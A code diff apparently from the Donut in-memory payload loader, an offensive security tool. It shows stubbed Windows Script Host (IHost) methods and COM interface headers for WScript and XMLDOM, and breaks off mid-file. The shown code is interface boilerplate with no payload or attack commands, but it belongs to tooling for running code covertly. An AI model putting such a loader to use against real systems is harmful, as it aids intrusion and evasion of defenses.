274 return E_NOTIMPL;
275 }
276
277 // Outputs text to either a message box or the command console window.
278 static HRESULT WINAPI Host_Echo(
279 IHost *iface, SAFEARRAY *args) {
280 DPRINT("WScript::Echo");
281
282 return E_NOTIMPL;
283 }
284
285 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
286 static HRESULT WINAPI Host_GetObject(
287 IHost *iface, BSTR Pathname, BSTR ProgID,
288 BSTR Prefix, IDispatch **out_Dispatch) {
289 DPRINT("WScript::GetObject");
290
291 return E_NOTIMPL;
292 }
293
294 // Disconnects a connected object's event sources.
295 static HRESULT WINAPI Host_DisconnectObject(
296 IHost *iface, IDispatch *Object) {
297 DPRINT("WScript::DisconnectObject");
298
299 return E_NOTIMPL;
300 }
301
302 // Suspends script execution for a specified length of time, then continues execution.
303 static HRESULT WINAPI Host_Sleep(
304 IHost *iface, LONG Time) {
305
306 DPRINT("WScript::Sleep");
307 iface->inst->api.Sleep((DWORD)Time);
308
309 return S_OK;
310 }
311
312 // Connects the object's event sources to functions with a given prefix.
313 static HRESULT WINAPI Host_ConnectObject(
314 IHost *iface, IDispatch *Object, BSTR Prefix) {
315 DPRINT("WScript::ConnectObject");
316
317 return E_NOTIMPL;
318 }
319
320 // Exposes the read-only input stream for the current script.
321 static HRESULT WINAPI Host_get_StdIn(
322 IHost *iface, void **ppts) { // ppts is ITextStream
323 DPRINT("WScript::StdIn");
324
325 return E_NOTIMPL;
326 }
327
328 // Exposes the write-only output stream for the current script.
329 static HRESULT WINAPI Host_get_StdOut(
330 IHost *iface, void **ppts) { // ppts is ITextStream
331 DPRINT("WScript::StdOut");
332
333 return E_NOTIMPL;
334 }
335
336 // Exposes the write-only error output stream for the current script.
337 static HRESULT WINAPI Host_get_StdErr(
338 IHost *iface, void **ppts) { // ppts is ITextStream
339 DPRINT("WScript::StdErr");
340
341 return E_NOTIMPL;
342 }
+284
-0
loader/wscript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+588
-0
loader/xmldom.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
